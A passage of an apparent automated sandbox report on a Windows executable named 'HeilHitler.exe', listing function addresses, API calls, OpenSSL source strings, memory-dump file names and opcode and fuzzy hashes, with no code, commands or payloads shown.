                                                                                                                                                                                                                                            Function 00007FFDFAF42743 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007
                                                                                                                                                                                                                                            • String ID: %02d%02d%02d%02d%02d%02dZ$%04d%02d%02d%02d%02d%02dZ
                                                                                                                                                                                                                                            • API String ID: 3568877910-2648760357
                                                                                                                                                                                                                                            • Opcode ID: 2a3bc1689ddc0f887af3b9ff0742d7664fa732a47decfc4233859a34b1d629f8
                                                                                                                                                                                                                                            • Instruction ID: 2c5b6db37c18bbafd1545bb69879b3316697faa9cbe83242dd0772c119ddee43
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a3bc1689ddc0f887af3b9ff0742d7664fa732a47decfc4233859a34b1d629f8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50515372B187818AE764DF15E45066AB7A0FF89750F044235FA9D8BB9DDF3CE9408B00
                                                                                                                                                                                                                                            Function 00007FFDFAF41613 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: getaddrinfo
                                                                                                                                                                                                                                            • String ID: ..\s\crypto\bio\b_addr.c
                                                                                                                                                                                                                                            • API String ID: 300660673-2547254400
                                                                                                                                                                                                                                            • Opcode ID: a0b5319feac94952a1432a4b762969270d9d630226e0b1293bfa37404cbb0f4b
                                                                                                                                                                                                                                            • Instruction ID: 2e88f729119542b9a2d2349d2dcb214ab342465ca380623f591756393880fab1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0b5319feac94952a1432a4b762969270d9d630226e0b1293bfa37404cbb0f4b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D41D172B1868387E7548B12E860ABE7391FB85B84F044135FAAA47BD9DF3CD9459B00
                                                                                                                                                                                                                                            Function 00007FFDFAE823C4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007E13331210
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_clnt.c
                                                                                                                                                                                                                                            • API String ID: 1677897744-592572767
                                                                                                                                                                                                                                            • Opcode ID: 681ca32c43e687601a72343e186ad25e786e8a1d2c56bc4b349ba56f2cbe764a
                                                                                                                                                                                                                                            • Instruction ID: f390b39db86a4970431c8097669f865050c24ae1f8a3053a423a1bdcfc8a1272
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 681ca32c43e687601a72343e186ad25e786e8a1d2c56bc4b349ba56f2cbe764a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B941C272708A81C6EB289B11E5546ADB7A4FB44BC4F148072DBAE0BBDDDF3DD6918700
                                                                                                                                                                                                                                            Function 00007FF633D79014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D79046
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A948: GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF633D6CBA5), ref: 00007FF633D79064
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                            • API String ID: 3580290477-2243985011
                                                                                                                                                                                                                                            • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                            • Instruction ID: 9701e2203530df1d37851d7f3befcf6e76ec76ec48aeee2e83f82e91ee57d9c5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5841C032A08B1286EB14DFA1D8420BD63A4EF447D0B554235ED4EE3B85CF3DE4A6E300
                                                                                                                                                                                                                                            Function 00007FF633D7CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                            • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                            • Instruction ID: 19f18fa483c2f33693694605881a2da7bc54fe51dfafeebc5f756f4136fe1acb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD41A332B18A8185EB608F65E4453BA77A0FB88B84F944235EE4DD7798EF3CD441D740
                                                                                                                                                                                                                                            Function 00007FFDFAF439B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007E2002
                                                                                                                                                                                                                                            • String ID: ..\s\crypto\rand\randfile.c$Filename=
                                                                                                                                                                                                                                            • API String ID: 1750240854-2201148535
                                                                                                                                                                                                                                            • Opcode ID: 6b3b0f7a3795f012e9ff1fc1ebc767fdf81fc92d56402ad81cac52365df12dad
                                                                                                                                                                                                                                            • Instruction ID: dea53edd868a1f6cdd0dfcead8c6c8f67e45dbd49bbaf74c7e9ed727bf7152ff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b3b0f7a3795f012e9ff1fc1ebc767fdf81fc92d56402ad81cac52365df12dad
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6531A166F0968782FB24DB12E420BAA6750FF44788F444135EA6D476EDEF3CE604C700
                                                                                                                                                                                                                                            Function 00007FFDFAE86550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$System$File
                                                                                                                                                                                                                                            • String ID: gfff
                                                                                                                                                                                                                                            • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                            • Opcode ID: f6e690c008a50fba309e4810556e3a08f0a38e0289250941bf64fab63e84ad4b
                                                                                                                                                                                                                                            • Instruction ID: 46f646b904b250eae01b2704aad1453db3afea6d4672d8031419b33a8cef1f01
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6e690c008a50fba309e4810556e3a08f0a38e0289250941bf64fab63e84ad4b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4421E97270468786DB58DF29E52077977E0EB88788F44C075EA6ECB798DE3DD0408700
                                                                                                                                                                                                                                            Function 00007FFDFAEB3B40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_sess.c$T
                                                                                                                                                                                                                                            • API String ID: 0-2647723609
                                                                                                                                                                                                                                            • Opcode ID: 2738ae770119198ad7c47fd9ebfa88edacb67cbaab7b8918c68778f86e0758ed
                                                                                                                                                                                                                                            • Instruction ID: 338a95149e73a5cb6f7f55089dad51280add143d5e8efb10b1059304ca38ef12
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2738ae770119198ad7c47fd9ebfa88edacb67cbaab7b8918c68778f86e0758ed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6021A230B1864282FB08AB61D865BE976D0EF44744F8440B6EA1E477C9EF7EE504CB10
                                                                                                                                                                                                                                            Function 00007FF633D7F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                            • Opcode ID: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
                                                                                                                                                                                                                                            • Instruction ID: 8eb12bc165134f41b4cb3792588da0e60e246dae2e205a758614a1fe4bf5d5fe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44212372A1868181EB308F51D44627D73B5FB88B84F864335DAADAB394DF7CE9849B40
                                                                                                                                                                                                                                            Function 00007FFDFAE8175D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007E13331210
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_srvr.c$3
                                                                                                                                                                                                                                            • API String ID: 1677897744-3555168737
                                                                                                                                                                                                                                            • Opcode ID: 02e4923c65d91dd17ed78d59ecd45d247cd09b3b530dfdedfddf0ce4932c12f5
                                                                                                                                                                                                                                            • Instruction ID: 4aaf6d1f1a2284394ea3e7c0bcd53cbe8c70bb95c485e494ffeef84d8d24bb01
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02e4923c65d91dd17ed78d59ecd45d247cd09b3b530dfdedfddf0ce4932c12f5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C921E032708B4082EB599B11E850BAC63A4EB44B88F584131DE6D4BBD8DF7ED6D0C700
                                                                                                                                                                                                                                            Function 00007FFDFAD62700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
